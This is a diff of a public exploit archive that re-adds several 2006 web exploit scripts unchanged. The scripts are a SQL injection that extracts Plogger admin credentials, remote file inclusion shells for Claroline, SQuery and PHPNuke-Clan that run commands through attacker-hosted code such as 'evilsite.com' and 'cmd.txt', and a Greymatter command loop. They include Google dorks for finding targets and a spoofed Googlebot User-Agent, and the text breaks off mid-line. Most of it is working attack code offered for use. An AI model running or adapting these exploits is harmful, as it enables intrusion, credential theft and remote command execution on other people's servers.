<\ ___/| | \// / # +# \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ # +# \/ \/ \/ \/ \/ \/ # +# Iran Hackerz Security Team # +# WebSite: www.hackerz.ir # +# DeltaHAcking Team # +# website: www.deltahacking.com # +###################################################### +# Name : Greymatter # +# Site : http://www.noahgrey.com/greysoft/ # 
+###################################################### +# example: +# target : www.yesite.com/Greymatter/ +# archive number : 00000141 +use LWP::Simple; + + +print "-------------------------------------------\n"; +print "= Greymatter =\n"; +print "= By Hessam-x - www.hackerz.ir =\n"; +print "= Vampire - www.deltahacking.com =\n"; +print "-------------------------------------------\n\n"; + + + print "Target >http://"; + chomp($targ = ); + print "archive number >"; + chomp($arnum= ); + + $con=get("http://".$targ) || die "[-]Cannot connect to Host"; +while () +{ + print "Hessam-x@Greymatter \$"; + chomp($comd=); + $commd=get("http://".$targ."archives/".$arnum.".php?cmd=".comd) +} + +# milw0rm.com [2006-03-28] diff --git a/platforms/php/webapps/1621.php b/platforms/php/webapps/1621.php index d0adb70dc..d08fa8213 100755 --- a/platforms/php/webapps/1621.php +++ b/platforms/php/webapps/1621.php 
@@ -1,165 +1,165 @@ -#!/usr/bin/php -q -d short_open_tag=on - works with magic_quotes_gpc = Off\r\n\r\n"; -echo "dork: intext:\"Powered by Plogger!\" -plogger.org\r\n\r\n"; - -if ($argc<3) { -echo "Usage: php ".$argv[0]." host path OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to plogger\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /plogger/\r\n"; -echo "php ".$argv[0]." localhost /plogger/ -p81\r\n"; -echo "php ".$argv[0]." localhost / -P1.1.1.1:80\r\n"; -die; -} - -/* - explaination: - - software site: http://www.plogger.org/ - description: "Plogger: The definitive open-source web photo gallery - Plogger - is a free online photo gallery generation script with automatic thumbnail - creation, easy installation, and RSS feeds." - - vulnerable code in gallery.php near lines 37-38: - - ... - if ($_GET["level"] == "slideshow") - $inHead .= generate_slideshow_js($_GET["id"], "album"); - ... 
- - "id" GET argument is not properly sanitized before to be passed to - generate_slideshow_js() func, so, if magic_quotes_gpc = Off, sql injection, - poc : - - http://[target]/[path]/index.php?level=slideshow&mode=album&id='UNION SELECT - CONCAT('*USERNAME*:',admin_username,'***'),2,3,CONCAT('*HASH*:',admin_password - ,'***'),5,6,7,8,9,10,11,12,13,14 FROM plogger_config/* - - query becomes: - - SELECT * FROM plogger_pictures WHERE parent_album = ''UNION SELECT - CONCAT('*USERNAME*',admin_username,'***'),2,3,CONCAT('*HASH*',admin_password, - '***'),5,6,7,8,9,10,11,12,13,14 FROM plogger_config/*' ORDER BY - `date_submitted` - - now, at screen, you have admin credentials */ - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/')) -{die("Check the path, it must begin and end with a trailing slash\r\n");} -$port=80; -$proxy=""; -if ($argv[3]<>'') -{ -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -} -if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} - -$sql ="'UNION SELECT CONCAT('*USERNAME*',admin_username,'***'),2,3,CONCAT('*HASH*'"; -$sql.=",admin_password,'***'),5,6,7,8,9,10,11,12,13,14 FROM plogger_config/*"; -$sql=urlencode($sql); -$packet ="GET ".$p."index.php?level=slideshow&mode=album&id=".$sql." HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -if (strstr($html,"*HASH*")) -{ - echo "Exploit succeeded...\r\n"; - $temp=explode("*USERNAME*",$html); - $temp2=explode("***",$temp[1]); - $admin_name=$temp2[0]; - echo "Admin name -> ".$admin_name."\r\n"; - $temp=explode("*HASH*",$html); - $temp2=explode("***",$temp[1]); - $admin_password=$temp2[0]; - echo "Admin password hash -> ".$admin_password."\r\n"; -} -else -{echo "Exploit failed... 
magic quotes on here or Plogger patched \r\n";} -?> - -# milw0rm.com [2006-03-28] +#!/usr/bin/php -q -d short_open_tag=on + works with magic_quotes_gpc = Off\r\n\r\n"; +echo "dork: intext:\"Powered by Plogger!\" -plogger.org\r\n\r\n"; + +if ($argc<3) { +echo "Usage: php ".$argv[0]." host path OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to plogger\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /plogger/\r\n"; +echo "php ".$argv[0]." localhost /plogger/ -p81\r\n"; +echo "php ".$argv[0]." localhost / -P1.1.1.1:80\r\n"; +die; +} + +/* + explaination: + + software site: http://www.plogger.org/ + description: "Plogger: The definitive open-source web photo gallery - Plogger + is a free online photo gallery generation script with automatic thumbnail + creation, easy installation, and RSS feeds." + + vulnerable code in gallery.php near lines 37-38: + + ... + if ($_GET["level"] == "slideshow") + $inHead .= generate_slideshow_js($_GET["id"], "album"); + ... 
+ + "id" GET argument is not properly sanitized before to be passed to + generate_slideshow_js() func, so, if magic_quotes_gpc = Off, sql injection, + poc : + + http://[target]/[path]/index.php?level=slideshow&mode=album&id='UNION SELECT + CONCAT('*USERNAME*:',admin_username,'***'),2,3,CONCAT('*HASH*:',admin_password + ,'***'),5,6,7,8,9,10,11,12,13,14 FROM plogger_config/* + + query becomes: + + SELECT * FROM plogger_pictures WHERE parent_album = ''UNION SELECT + CONCAT('*USERNAME*',admin_username,'***'),2,3,CONCAT('*HASH*',admin_password, + '***'),5,6,7,8,9,10,11,12,13,14 FROM plogger_config/*' ORDER BY + `date_submitted` + + now, at screen, you have admin credentials */ + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/')) +{die("Check the path, it must begin and end with a trailing slash\r\n");} +$port=80; +$proxy=""; +if ($argv[3]<>'') +{ +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +} +if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} + +$sql ="'UNION SELECT CONCAT('*USERNAME*',admin_username,'***'),2,3,CONCAT('*HASH*'"; +$sql.=",admin_password,'***'),5,6,7,8,9,10,11,12,13,14 FROM plogger_config/*"; +$sql=urlencode($sql); +$packet ="GET ".$p."index.php?level=slideshow&mode=album&id=".$sql." HTTP/1.0\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +if (strstr($html,"*HASH*")) +{ + echo "Exploit succeeded...\r\n"; + $temp=explode("*USERNAME*",$html); + $temp2=explode("***",$temp[1]); + $admin_name=$temp2[0]; + echo "Admin name -> ".$admin_name."\r\n"; + $temp=explode("*HASH*",$html); + $temp2=explode("***",$temp[1]); + $admin_password=$temp2[0]; + echo "Admin password hash -> ".$admin_password."\r\n"; +} +else +{echo "Exploit failed... magic quotes on here or Plogger patched \r\n";} +?> + +# milw0rm.com [2006-03-28] diff --git a/platforms/php/webapps/1627.php b/platforms/php/webapps/1627.php index 64f89ec72..1506a5db3 100755 
--- a/platforms/php/webapps/1627.php +++ b/platforms/php/webapps/1627.php 
@@ -1,174 +1,174 @@ -#!/usr/bin/php -q -d short_open_tag=on - works with register_globals = On & allow_url_fopen = On\r\n\r\n"; -echo "dork: \"Powered by Claroline\" -demo\r\n\r\n"; - -if ($argc<5) { -echo "Usage: php ".$argv[0]." host path location OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to claroline\r\n"; -echo "location: arbitrary location with the code to include\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com ls -la\r\n"; -echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com cat ./..\r\n"; -echo "/../inc/conf/claro_main.conf.php -p81\r\n"; -echo "php ".$argv[0]." target.com / http://evilsite.com uname -a -P1.1.1.1:80\r\n\r\n"; -echo "note, on remote location you need a\r\n"; -echo "/lib/fileUpload.lib.php/index.html\r\n"; -echo "or a\r\n"; -echo "/lib/pclzip/pclzip.lib.php/index.html\r\n"; -echo "with this code inside:\r\n\r\n"; -echo "'."\r\n"; -die; -} - -/* - explaination: - software site: http://www.claroline.net/ - description: Claroline is a free application based on PHP/MySQL allowing - teachers or education organizations to create and administrate - courses through the web. 
- - vulnerabilities: - - i) system disclosure: - without to have an account you can see (not modify or include) all files on target system - regardless of any php.ini settings, ex: - - http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../../../apache/logs/error.log - http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../claroline/inc/conf/claro_main.conf.php - (see inside html for this) - - ii) xss & full path disclosure: - http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file="> - - iii) and finally, arbitrary remote inclusion / remote commands execution: - - iii.a)if register_globals = On & allow_url_fopen = On: - http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=http://evil.site.com - where on: - http://evil.site.com/lib/fileUpload.lib.php/index.html - or: - http://evil.site.com/lib/pclzip/pclzip.lib.php/index.html - you have some php code - - iii.b)if register_globals = On & magic_quotes_gpc = Off: - http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=/../../../../apache/logs/access.log%00 - (after you have injected some code in Apache log files and braking the path - through a null char) - - this is the exploit for iii.a) - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = 
'(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1];$path=$argv[2];$location=$argv[3];$cmd=''; -if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/')) -{die("Check the path, it must begin and end with a trailing slash\r\n");} -$port=80;$proxy=""; -for ($i=4; $i<=$argc-1; $i++) -{ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} - -$packet ="GET ".$p."claroline/learnPath/include/scormExport.inc.php"; -$packet.="?cmd=".urlencode($cmd)."&includePath=".urlencode($location)." 
HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -if (strstr($html,"*delim*")) -{ - echo "Exploit succeeded...\r\n\r\n"; - $temp=explode("*delim*",$html); - echo $temp[1]; -} -else -{echo "Exploit failed...";} -?> - -# milw0rm.com [2006-03-30] +#!/usr/bin/php -q -d short_open_tag=on + works with register_globals = On & allow_url_fopen = On\r\n\r\n"; +echo "dork: \"Powered by Claroline\" -demo\r\n\r\n"; + +if ($argc<5) { +echo "Usage: php ".$argv[0]." host path location OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to claroline\r\n"; +echo "location: arbitrary location with the code to include\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com ls -la\r\n"; +echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com cat ./..\r\n"; +echo "/../inc/conf/claro_main.conf.php -p81\r\n"; +echo "php ".$argv[0]." target.com / http://evilsite.com uname -a -P1.1.1.1:80\r\n\r\n"; +echo "note, on remote location you need a\r\n"; +echo "/lib/fileUpload.lib.php/index.html\r\n"; +echo "or a\r\n"; +echo "/lib/pclzip/pclzip.lib.php/index.html\r\n"; +echo "with this code inside:\r\n\r\n"; +echo "'."\r\n"; +die; +} + +/* + explaination: + software site: http://www.claroline.net/ + description: Claroline is a free application based on PHP/MySQL allowing + teachers or education organizations to create and administrate + courses through the web. 
+ + vulnerabilities: + + i) system disclosure: + without to have an account you can see (not modify or include) all files on target system + regardless of any php.ini settings, ex: + + http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../../../apache/logs/error.log + http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../claroline/inc/conf/claro_main.conf.php + (see inside html for this) + + ii) xss & full path disclosure: + http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file="> + + iii) and finally, arbitrary remote inclusion / remote commands execution: + + iii.a)if register_globals = On & allow_url_fopen = On: + http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=http://evil.site.com + where on: + http://evil.site.com/lib/fileUpload.lib.php/index.html + or: + http://evil.site.com/lib/pclzip/pclzip.lib.php/index.html + you have some php code + + iii.b)if register_globals = On & magic_quotes_gpc = Off: + http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=/../../../../apache/logs/access.log%00 + (after you have injected some code in Apache log files and braking the path + through a null char) + + this is the exploit for iii.a) + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = 
'(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1];$path=$argv[2];$location=$argv[3];$cmd=''; +if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/')) +{die("Check the path, it must begin and end with a trailing slash\r\n");} +$port=80;$proxy=""; +for ($i=4; $i<=$argc-1; $i++) +{ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} + +$packet ="GET ".$p."claroline/learnPath/include/scormExport.inc.php"; +$packet.="?cmd=".urlencode($cmd)."&includePath=".urlencode($location)." HTTP/1.0\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +if (strstr($html,"*delim*")) +{ + echo "Exploit succeeded...\r\n\r\n"; + $temp=explode("*delim*",$html); + echo $temp[1]; +} +else +{echo "Exploit failed...";} +?> + +# milw0rm.com [2006-03-30] 
diff --git a/platforms/php/webapps/1629.pl b/platforms/php/webapps/1629.pl index 3fa810acd..cb69e258a 100755 --- a/platforms/php/webapps/1629.pl +++ b/platforms/php/webapps/1629.pl 
@@ -1,88 +1,88 @@ -#!/usr/bin/perl -## -# SQuery <= 4.5 Remote File Inclusion Exploit -# Bug Found By uid0 code by zod -## -# (c) 2006 -# ExploiterCode.com -## -# usage: -# perl squery.pl -# -# perl squery.pl http://site.com/SQuery/ http://site.com/cmd.txt cmd -# -# cmd shell example: -# -# cmd shell variable: ($_GET[cmd]); -## -# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! -# -# special shout to [ill]will! -## -# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com -## - -use LWP::UserAgent; - -$Path = $ARGV[0]; -$Pathtocmd = $ARGV[1]; -$cmdv = $ARGV[2]; - -if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} - -head(); - -while() -{ - print "[shell] \$"; -while() - { - $cmd=$_; - chomp($cmd); - -$xpl = LWP::UserAgent->new() or die; -$req = HTTP::Request->new(GET =>$Path.'lib/armygame.php?libpath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; - -$res = $xpl->request($req); -$return = $res->content; -$return =~ tr/[\n]/[ê]/; - -if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} - -elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) - {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} -elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"} - -if($return =~ /(.+).Fatal.error/) - - -{ - $finreturn = $1; - $finreturn=~ tr/[ê]/[\n]/; - print "\r\n$finreturn\n\r"; - last; -} - -else {print "[shell] \$";}}}last; - -sub head() - { - print "\n============================================================================\r\n"; - print " *SQuery <= 4.5 Remote File Inclusion Exploit*\r\n"; - print "============================================================================\r\n"; - } -sub usage() - { - head(); - print " Usage: perl squery.pl \r\n\n"; - print " - Full path to SQuery ex: http://www.site.com/SQuery/ \r\n"; - print " - Path to cmd 
Shell e.g http://www.different-site.com/cmd.txt \r\n"; - print " - Command variable used in php shell \r\n"; - print "============================================================================\r\n"; - print " Bug Found by uid0\r\n"; - print " www.exploitercode.com irc.exploitercode.com #exploitercode\r\n"; - print "============================================================================\r\n"; - exit(); - } - -# milw0rm.com [2006-04-01] +#!/usr/bin/perl +## +# SQuery <= 4.5 Remote File Inclusion Exploit +# Bug Found By uid0 code by zod +## +# (c) 2006 +# ExploiterCode.com +## +# usage: +# perl squery.pl +# +# perl squery.pl http://site.com/SQuery/ http://site.com/cmd.txt cmd +# +# cmd shell example: +# +# cmd shell variable: ($_GET[cmd]); +## +# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! +# +# special shout to [ill]will! +## +# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com +## + +use LWP::UserAgent; + +$Path = $ARGV[0]; +$Pathtocmd = $ARGV[1]; +$cmdv = $ARGV[2]; + +if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} + +head(); + +while() +{ + print "[shell] \$"; +while() + { + $cmd=$_; + chomp($cmd); + +$xpl = LWP::UserAgent->new() or die; +$req = HTTP::Request->new(GET =>$Path.'lib/armygame.php?libpath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; + +$res = $xpl->request($req); +$return = $res->content; +$return =~ tr/[\n]/[ê]/; + +if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} + +elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) + {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} +elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"} + +if($return =~ /(.+).Fatal.error/) + + +{ + $finreturn = $1; + $finreturn=~ tr/[ê]/[\n]/; + print "\r\n$finreturn\n\r"; + last; +} + +else {print "[shell] \$";}}}last; + +sub 
head() + { + print "\n============================================================================\r\n"; + print " *SQuery <= 4.5 Remote File Inclusion Exploit*\r\n"; + print "============================================================================\r\n"; + } +sub usage() + { + head(); + print " Usage: perl squery.pl \r\n\n"; + print " - Full path to SQuery ex: http://www.site.com/SQuery/ \r\n"; + print " - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n"; + print " - Command variable used in php shell \r\n"; + print "============================================================================\r\n"; + print " Bug Found by uid0\r\n"; + print " www.exploitercode.com irc.exploitercode.com #exploitercode\r\n"; + print "============================================================================\r\n"; + exit(); + } + +# milw0rm.com [2006-04-01] diff --git a/platforms/php/webapps/1630.pl b/platforms/php/webapps/1630.pl index ed485bd91..3af4cd46f 100755 --- a/platforms/php/webapps/1630.pl +++ b/platforms/php/webapps/1630.pl 
@@ -1,89 +1,89 @@ -#!/usr/bin/perl -## -# PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit -# Bug Found By uid0 code by zod -## -# (c) 2006 -# ExploiterCode.com -## -# usage: -# perl pnc.pl -# -# perl pnc.pl http://site.com/PNC/ http://site.com/cmd.txt cmd -# -# cmd shell example: -# -# cmd shell variable: ($_GET[cmd]); -## -# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! -# -# special shout to [ill]will! -## -# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com -## - -use LWP::UserAgent; - -$Path = $ARGV[0]; -$Pathtocmd = $ARGV[1]; -$cmdv = $ARGV[2]; - -if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} - -head(); - -while() -{ - print "[shell] \$"; -while() - { - $cmd=$_; - chomp($cmd); - -$xpl = LWP::UserAgent->new() or die; -$req = HTTP::Request->new(GET =>$Path.'modules/vWar_Account/includes/functions_common.php?vwar_root2='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; - -$res = $xpl->request($req); -$return = $res->content; -$return =~ tr/[\n]/[ê]/; - -if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} - -elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) - {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} -elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"} - -if($return =~ /(.+).Warning.(.+).Warning/) - - - -{ - $finreturn = $1; - $finreturn=~ tr/[ê]/[\n]/; - print "\r\n$finreturn\n\r"; - last; -} - -else {print "[shell] \$";}}}last; - -sub head() - { - print "\n============================================================================\r\n"; - print " *PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit*\r\n"; - print "============================================================================\r\n"; - } -sub usage() - { - head(); - print " Usage: perl pnc.pl \r\n\n"; - print " - Full path to PNC ex: 
http://www.site.com/PNC/ \r\n"; - print " - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n"; - print " - Command variable used in php shell \r\n"; - print "============================================================================\r\n"; - print " Bug Found by uid0\r\n"; - print " www.exploitercode.com irc.exploitercode.com #exploitercode\r\n"; - print "============================================================================\r\n"; - exit(); - } - -# milw0rm.com [2006-04-01] +#!/usr/bin/perl +## +# PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit +# Bug Found By uid0 code by zod +## +# (c) 2006 +# ExploiterCode.com +## +# usage: +# perl pnc.pl +# +# perl pnc.pl http://site.com/PNC/ http://site.com/cmd.txt cmd +# +# cmd shell example: +# +# cmd shell variable: ($_GET[cmd]); +## +# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! +# +# special shout to [ill]will! +## +# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com +## + +use LWP::UserAgent; + +$Path = $ARGV[0]; +$Pathtocmd = $ARGV[1]; +$cmdv = $ARGV[2]; + +if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} + +head(); + +while() +{ + print "[shell] \$"; +while() + { + $cmd=$_; + chomp($cmd); + +$xpl = LWP::UserAgent->new() or die; +$req = 